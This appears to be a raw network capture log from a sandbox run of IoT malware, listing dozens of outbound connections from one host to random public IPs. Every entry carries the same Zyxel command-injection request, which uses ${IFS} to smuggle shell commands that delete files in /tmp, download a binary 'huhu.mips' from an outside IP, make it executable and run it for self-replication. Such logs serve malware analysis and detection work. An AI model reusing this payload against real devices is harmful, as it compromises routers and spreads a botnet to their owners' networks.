                                                        Feb 2, 2024 06:20:32.514760017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.1435222124.163.92.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:32.514820099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.145883818.56.167.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518140078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.1457970130.68.236.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518171072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.1446512181.144.80.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518197060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.1437630104.247.255.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518243074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.144734460.171.35.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518271923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.143998093.63.7.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:33.518284082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.144470090.111.168.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521460056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.1448632209.240.180.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521528006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.145912249.33.37.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521528006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.1459106160.97.37.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521553993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.14364008.165.194.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521569014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.1457204181.100.214.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521588087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.1443036161.133.45.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521648884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.1455762164.28.200.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521681070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.144971223.229.99.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521735907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.1442714166.184.142.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521754980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.144355051.78.82.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:34.521780968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.143601689.46.185.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:35.525408030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.1434580126.2.201.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:35.525441885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.144820262.127.151.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:35.525523901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.145400847.136.158.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:35.525580883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.145334670.192.184.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530003071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.1449604202.206.5.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530050039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.144821482.76.231.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530098915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.1451800153.30.101.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530132055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.1457588113.240.26.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530236006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.143967672.136.214.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530261040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.1448960144.186.183.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530348063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.144413879.174.43.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:36.530380964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.1446092178.189.136.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534059048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.1444088202.135.141.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534116983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.145042676.8.7.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534153938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.145224074.5.11.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534193039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.144034673.42.166.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534216881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.1448758191.7.143.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:37.534245968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.1445636197.86.248.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:38.540815115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.144367497.199.237.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:38.540904999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.144259441.52.39.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:38.540932894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.1455554153.240.213.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:39.544079065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.1440598128.242.100.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:39.544117928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.145272635.57.152.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:39.544156075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.145330291.237.155.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:39.544188023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.1456214203.228.136.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:39.544218063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.1434924199.214.172.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553241968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.143967237.180.200.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553289890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.1444956189.89.246.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553339005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.143314269.123.231.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553349972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.1437232149.174.130.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553394079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.144025675.8.171.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:41.553492069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.144176249.178.76.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:42.557816982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.145701413.26.236.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:42.557852983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.144141817.214.219.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:43.561208963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.1437508173.143.10.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:43.561234951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.1458748177.33.74.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:43.561270952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        444192.168.2.1444584139.250.75.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:43.561328888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.1443142187.246.44.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:43.561341047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.145543865.0.13.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:44.565186977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.1457502148.84.78.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:44.565237999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.143649292.92.182.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:44.565269947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.1436468210.189.183.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:46.574306965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.145003277.27.102.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:46.574353933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.144736084.125.144.2443
                                                        TimestampBytes transferredDirectionData
